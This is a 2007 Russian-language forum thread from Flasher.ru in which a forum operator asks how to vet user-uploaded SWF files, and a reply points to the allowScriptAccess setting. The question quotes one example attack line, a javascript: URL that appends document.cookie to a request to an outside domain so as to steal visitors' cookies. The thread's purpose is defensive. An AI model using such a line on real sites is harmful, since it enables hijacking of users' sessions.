Форум Flasher.ru

Форум Flasher.ru (http://www.flasher.ru/forum/index.php)
-   ActionScript 3.0 (http://www.flasher.ru/forum/forumdisplay.php?f=83)
-   -   Как проверить SWF на открытие ссылок? (http://www.flasher.ru/forum/showthread.php?t=103902)

LinuxVideo 14.11.2007 22:31

Как проверить SWF на открытие ссылок?
 
Есть желание сделать вставку флеша на форуме. Как в посты, так и в аватары.

Проблема в том, что "продвинутые" пользователи могут не ограничиться красивой анимацией, а могут открывать окна с рекламой, в том числе и по таймеру, могут запускать чего-то вроде
Код:

javascript:document.images[0].src="http://somedomain.com/script?"+document.cookie
и прочие гадости. Если с рекламой все понятно, то кражи кукисов хотелось бы избежать.

Вопрос: как проверить загружаемый SWF-файл, дабы в нем небыло ссылок, и вообще, был безопасным?

etc 14.11.2007 23:13

Обратите внимание на параметры, указываемые в html, в особенности на allowScriptAccess.

LinuxVideo 14.11.2007 23:45

AllowScriptAccesscan have two possible values: "always" and "never":
When AllowScriptAccess is "never", outbound scripting will always fail.
When AllowScriptAccess is "always", outbound scripting will always succeed.

Вот только интересно, волшебные ссылки "javascript:" к чему относятся? Выполняются то они локально, а вот чего дальше будет вызвано...


Часовой пояс GMT +4, время: 06:11.

Copyright © 1999-2008 Flasher.ru. All rights reserved.
Работает на vBulletin®. Copyright ©2000 - 2026, Jelsoft Enterprises Ltd. Перевод: zCarot
Администрация сайта не несёт ответственности за любую предоставленную посетителями информацию. Подробнее см. Правила.